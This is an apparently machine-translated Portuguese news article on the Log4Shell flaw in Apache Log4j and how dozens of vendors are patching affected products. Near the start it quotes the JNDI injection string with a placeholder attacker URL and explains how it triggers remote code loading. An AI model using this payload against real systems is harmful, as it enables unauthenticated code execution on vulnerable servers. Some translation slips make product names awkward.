Ir para o conteúdo
As notícias sobre uma vulnerabilidade crítica na biblioteca de registro Apache Log4j vazaram na semana passada quando explorações de prova de conceito começaram a surgir na quinta-feira.
Log4j é uma estrutura de registro Java de código aberto parte dos Serviços de Registro Apache usados em nível corporativo em vários aplicativos de fornecedores em todo o mundo.
Embora a exploração maciça tenha começado apenas depois que o código de exploração se tornou livremente disponível, os ataques foram detectados desde o início do mês, de acordo com dados da Cloudflare e cisco Talos.
A falha do Log4Shell foi relatada pela equipe de segurança cloud do Alibaba em 24 de novembro e não está claro como alguns atacantes foram capazes de explorá-la tão cedo.
Em um comunicado no sábado sobre a vulnerabilidade do Log4Shell, Jen Easterly, diretora da Agência de Segurança cibernética e infraestrutura (CISA), diz que a agência está trabalhando com parceiros do setor privado e público para resolver o problema.
Log4Shell é uma injeção JNDI (Java Naming and Directory Interface, interface de nomeação e diretório) que permite a execução de código remoto não autenticado. Os adversários podem aproveitá-lo alterando o usuário-agente em seu navegador para uma sequência no seguinte formato: .${jndi:ldap://[attacker_URL]}
A sequência permanecerá nos registros do servidor web da vítima e forçará um retorno de chamada ou solicitação à URL do invasor quando a biblioteca Log4j analisar. Os atacantes podem usar a sequência para passar comandos codificados ou classes Java para a máquina vulnerável.
Imediatamente após os detalhes sobre o Log4Shell se tornarem conhecidos, os fornecedores começaram a investigar se seus produtos são afetados e forneceram informações sobre os resultados:
Adobe:
A Adobe determinou que o ColdFusion 2021 é vulnerável ao Log4Shell e abordou o risco de segurança em uma atualização lançada em 14 de dezembro. Uma solução alternativa está disponível se o patching não for possível imediatamente.
Amazônia:
A Amazon atualizou vários de seus produtos para usar uma versão não vulnerável do componente Log4j e anunciou que está em processo de atualização de outros ou lançará novas versões em breve.
A empresa publicou detalhes específicos para os serviços afetados, entre eles o OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass e API Gateway.
Atlassian:
Com base em sua avaliação, a empresa acredita que nenhum produto local é vulnerável à exploração em sua configuração padrão.
Modificar a configuração padrão de registro (log4j.properties) para habilitar a funcionalidade JMS Appender pode trazer o risco de execução remota de código em alguns produtos, como Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye e Crucible.
Broadcom:
A empresa publicou itens de mitigação e base de conhecimento para vários produtos Symantec afetados pela vulnerabilidade do Log4j. Estes incluem a Autenticação Avançada da CA, o Symantec SiteMinder (CA Single Sign-on), o VIP Authentication Hub e o Symantec Endpoint Protection Manager (SEPM).
Cisco:
A Cisco publicou uma lista de seus produtos afetados pelo Log4Shell, juntamente com um calendário para corrigir alguns deles a partir de 14 de dezembro.
Os produtos afetados são de várias categorias, incluindo os seguintes:
- Dispositivos de segurança de rede e conteúdo (Mecanismo de Serviços de Identidade, Defesa contra ameaças de poder de fogo, aplicativo avançado de relatórios de segurança da Web)
- Colaboração e mídias sociais (Cisco Webex Meetings Server)
- Gerenciamento e provisionamento de rede (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
- Roteamento e comutação empresarial (Cisco Network Assurance Engine e Cisco SD-WAN vManage)
Citrix:
Embora a investigação ainda esteja em andamento e o status possa mudar para alguns de seus produtos, a Citrix não listou nenhum de seus produtos como sendo vulnerável ao Log4Shell.
ConnectWise:
O serviço de nuvem da empresa, Perch, foi encontrado para contar com componentes de terceiros que eram “potencialmente vulneráveis”, lê um aviso do ConnectWise.
O terceiro vulnerável foi identificado como FortiGuard’s FortiGuard’s FortiSIEM, que é usado pela solução StratoZen do ConnectWise, levando a empresa a restringir temporariamente o acesso aos servidores StratoZen hospedados. O acesso agora é restaurado para a maioria dos serviços.
cPanel:
Um thread de fórum mostra que apenas os casos em que o plugin cPanel Solr está presente são afetados e podem ser explorados, mas apenas localmente.
Um membro da equipe forneceu mais tranquilidade anunciando que uma atualização com mitigação para o Log4Shell está disponível para o pacote cpanel-dovecot-solr.
Debian:
O pacote Log4j corrigido foi adicionado ao Debian 9 (Stretch), 10 (Buster), 11 (Bullseye) e 12 (Bookworm) como uma atualização de segurança, lê o aviso.
Docker:
Uma dúzia de imagens oficiais do Docker foram encontradas para usar uma versão vulnerável da biblioteca Log4j. A lista inclui couchbase, elasticsearch, logstash, sonarqubee solr.
Docker diz que está “no processo de atualização do Log4j 2 nessas imagens para a versão mais recente disponível” e que as imagens podem não estar vulneráveis por outras razões.
FortiGuard:
Um aviso da empresa lista quase uma dúzia de seus produtos como vulneráveis, com correções ou mitigações já implantadas para quatro deles.
A FortiGuard anunciou que o aviso seria atualizado com as datas para a aplicação de correções para outros produtos, como FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy e ShieldX.
F-Secure:
Ambas as versões do Windows e linux de vários produtos F-Secure são impactadas pelo Log4Shell: Policy Manager (apenas o componente Policy Manager Server), Policy Manager Proxy, Endpoint Proxy e Elements Connector.
A empresa criou um patch de segurança para os administradores corrigirem o problema e forneceu instruções passo a passo para implantá-lo.
Ghidra:
A ferramenta de engenharia reversa de código aberto da NSA recebeu uma atualização para a versão 10.1 que também atualiza a dependência do Log4j para uma iteração não vulnerável.
IBM:
A assessoria da IBM para o Log4Shell mostra que apenas as versões 9.0 e 8.5 do WebSphere Application foram afetadas pela vulnerabilidade, através do Console administrativo e dos componentes do Aplicativo de Registro UDDI, e que o problema foi resolvido.
Redes Juniper:
A empresa de networking divulgou que quatro de seus produtos são impactados: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder e Paragon Planner.
Enquanto a avaliação continua, nesta fase outros seis produtos podem ser afetados: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics e Security Director (não Security Director Insights)
McAfee:
A empresa ainda não completou sua avaliação e tem 12 produtos em análise e atualizará a assessoria com informações relevantes à medida que estiver disponível.
MongoDB:
Apenas o MongoDB Atlas Search precisava ser corrigido contra o Log4Shell, observa a empresa em um comunicado atualizado hoje
O desenvolvedor acrescenta que não encontrou nenhuma evidência de exploração ou indicadores de compromisso antes de implantar o patch.
Okta:
A Okta liberou atualizações para o Okta RADIUS Server Agent e o Okta On-Prem MFA Agent para mitigar o risco da vulnerabilidade Log4Shell e recomenda fortemente que os clientes apliquem as correções do Console administrativo.
Oracle:
A Oracle disse que “um número” de seus produtos, sem divulgar quais ou quantos, estão usando uma versão vulnerável do componente Log4j.
A empresa encaminhou seus clientes para o My Oracle Support Document e lançou um alerta de segurança com uma forte recomendação para aplicar as atualizações fornecidas “o mais rápido possível”.
Fundação OWASP:
Um aviso na sexta-feira revelou que versões do scanner de aplicativos web Zed Attack Proxy (ZAP) abaixo do 2.11.1 usam um componente Log4j vulnerável.
Chapéu Vermelho:
Componentes em vários produtos Red Hat são afetados pelo Log4Shell, a organização divulgou na sexta-feira, recomendando fortemente que os clientes apliquem as atualizações assim que estiverem disponíveis.
Entre os produtos listados no aviso estão Red Hat OpenShift 4 e 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8 e Red Hat Fuse 7.
Siemens:
A empresa descobriu que vários produtos são vulneráveis ao Log4Shell. O problema foi corrigido em alguns produtos, enquanto para outros estão sendo realizados testes para soluções de longo prazo.
Recomenda-se que os clientes atualizem o software da Siemens para a versão mais recente ou apliquem as soluções e mitigações que a empresa forneceu em sua assessoria, bem como sigam as orientações gerais de segurança.
SolarWinds:
Dois produtos da empresa usam uma versão vulnerável do Apache Log4j: Server & Application Monitor (SAM) e Database Performance Analyzer (DPA).
No entanto, ambos os produtos usam uma versão do Java Development Kit (JDK) que não é suscetível à vulnerabilidade logj4 ou reduz o risco.
SonarSource:
Um componente ElasticSearch no SonarQube usa a biblioteca Log4j e a empresa fornece mitigação para evitar qualquer risco. Uma correção, se necessário, estará disponível.
Por precaução, a SonarSource atualizou o SonarCloud para executar uma versão não vulnerável do Log4j, embora o produto de lá “não estivesse diretamente suscetível a essa vulnerabilidade”.
SonicWall:
Uma investigação em andamento revelou que a versão 10.x de Segurança de E-mail da SonicWall é impactada pela vulnerabilidade do Log4Shell. Uma correção está em desenvolvimento e deve ser lançada “em breve”.
Outros cinco produtos da SonicWall ainda estão sob revisão e o resto deles não deve ser impactado pelo problema, de acordo com um comunicado da empresa atualizado pela última vez no sábado.
Sófos:
A empresa descobriu que o Sophos Mobile EAS Proxy é vulnerável e recomenda que os clientes baixem a versão 9.72 para resolver o problema.
O Sophos Email e o Cloud Optix foram corrigidos antes que o ator de ameaças tentasse explorar a vulnerabilidade.
Splunk:
O Core Splunk Enterprise não é afetado a menos que a Pesquisa de Tecido de Dados seja usada. A empresa publicou uma tabela com as versões de seus produtos afetados pelo Log4Shell tanto na nuvem quanto no local.
No momento da redação, a empresa lançou correções para alguns produtos e atualmente está trabalhando em atualizações de rolamento para pelo menos sete de seus produtos.
TrendMicro:
A maioria dos produtos não é afetada pela vulnerabilidade do Log4Shell. Um pequeno número de serviços afetados foram corrigidos: Vision One, Trend Micro Email Security & HES, TippingPoint Threat Management Center (TMC), Sandbox as a Service e Cloud App Security.
VMware:
A VMware corrigiu vários de seus produtos vulneráveis a ataques log4Shell e atualmente está trabalhando para lançar patches para outros 27 produtos.
Em comunicado atualizado pela última vez hoje, a empresa lista quase 40 de seus produtos impactados pela vulnerabilidade crítica. Muitos deles mostram um “Patch Pending” e as mitigações estão disponíveis em alguns casos.
Ubiquiti:
O aplicativo unifi network, que usa a biblioteca Log4j, foi atualizado para atender à vulnerabilidade crítica do Log4Shell.
Ubuntu:
O pacote Log4j foi corrigido rio acima, lê o aviso de segurança, e a atualização agora tem que escorrer para ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo) e 21.10 (Impish Indri).
Zoho:
A empresa descobriu que o componente ADAudit Plus para auditar as alterações do Active Directory, que faz parte da solução de monitoramento ManageEngine, é vulnerável a ataques do Log4Shell.
Em um breve post hoje, Zoho forneceu instruções para mitigar o problema.
Zscaler:
A Zscaler corrigiu vários de seus produtos que usavam uma versão vulnerável da biblioteca Log4j. Depois de corrigir todos os seus serviços de Acesso Privado (ZPA) voltados para a internet pública, Zscaler Mobile Admin e suporte de componentes do Administrador Móvel, a empresa concluiu que o problema foi corrigido em todos os seus produtos.
O acima não é uma lista exaustiva de fornecedores que estão investigando ou consertaram seus produtos contra o Log4Shell. Um inventário mais abrangente está disponível no Dutch Nationaal Cyber Security Centrum, para softwares vulneráveis/não vulneráveis conhecidos.
